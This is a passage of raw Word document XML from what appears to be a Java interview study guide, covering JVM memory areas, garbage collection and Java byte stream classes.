          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stores class structures, method code, and static variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6327B4" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b) Heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6EDE5" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stores all objects and their instance variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71114B4C" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage collection works here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F828C09" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c) JVM Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42FEA1" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each thread has its own stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F134C" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stores frames for each method call (local variables, operands, return values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180415EA" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d) PC Registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC97A89" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tracks the execution position for each thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6ED361" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e) Native Method Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B00295" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For native code (non-Java code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5DEDBB" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705FFFDE" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE7DDA9" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automatically reclaims memory from objects no longer in use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F7988" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runs in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5627C7" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Different algorithms available (Serial, Parallel, G1, ZGC, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E06E3" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00552EC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01869D7F" w14:textId="77777777" w:rsidR="00BC7A53" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC7A53" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6166BF75" w14:textId="77777777" w:rsidR="00BC7A53" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC7A53" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2A1855" w14:textId="2454B9C0" w:rsidR="00DD113C" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70CC4" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4704E0D5" wp14:editId="2EFED57D">
            <wp:extent cx="5040034" cy="4063046"/>
            <wp:effectExtent l="57150" t="57150" r="103505" b="90170"/>
            <wp:docPr id="590546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546285" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5058943" cy="4078289"/>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1B4021D9" w14:textId="10362AB9" w:rsidR="00797C94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="065F4712">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34577FD9" w14:textId="6CAE7CAE" w:rsidR="00BC7A53" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC7A53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc196307485"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the byte stream in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4FC3FA3D" w14:textId="1010D934" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Byte Stream in Java is used to perform input and output of 8-bit bytes. It is mainly used to read and write binary data like images, videos, audio files, PDF, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63E129" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">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2A6BB48">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1BB10" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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Byte Stream Classes (Hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39320E22"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l byte stream classes are derived from these two abstract clas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7"/>
        <w:gridCol w:w="1342"/>
        <w:gridCol w:w="916"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="16C477E5" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50550677" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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ream Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E5F472" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DFA4DC" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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irection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="61886F31" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A385C38"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put Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F368385"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putStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5960617A"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ading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="7B078722" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A1E9DE4"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utput Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="139C0DAC"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utputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64C52ACA"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riting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F1B444D" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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mmon Byte InputStream Clas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1"/>
        <w:gridCol w:w="5007"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="44BE5B32" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54183063" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F052DE4" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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7F1325" w:rsidRPr="00CE4B95" w14:paraId="322D5140" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55BD5F0F"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leInputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF4B0BE"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ads data from a file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="1EAF58DA" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F92D121"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ufferedInputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E6DA067"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ads data efficiently using a buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="00F33D7D" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F056F8"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yteArrayInputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4555A3"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ads data from a byte array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="2D03995E" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E8A8DC6"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bjectInputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="746DA298"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ads Java objects from a stream (used in serialization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E1F7BD8" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F1325">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40A93CE">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DEFF5D" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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mmon Byte OutputStream Clas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5"/>
        <w:gridCol w:w="3331"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="740B093A" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF749DC" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52D943CE" w14:textId="77777777" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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7F1325" w:rsidRPr="00CE4B95" w14:paraId="2A97C08B" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666DFCA4"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leOutputStream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2482021C"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rites data to a file</w:t>
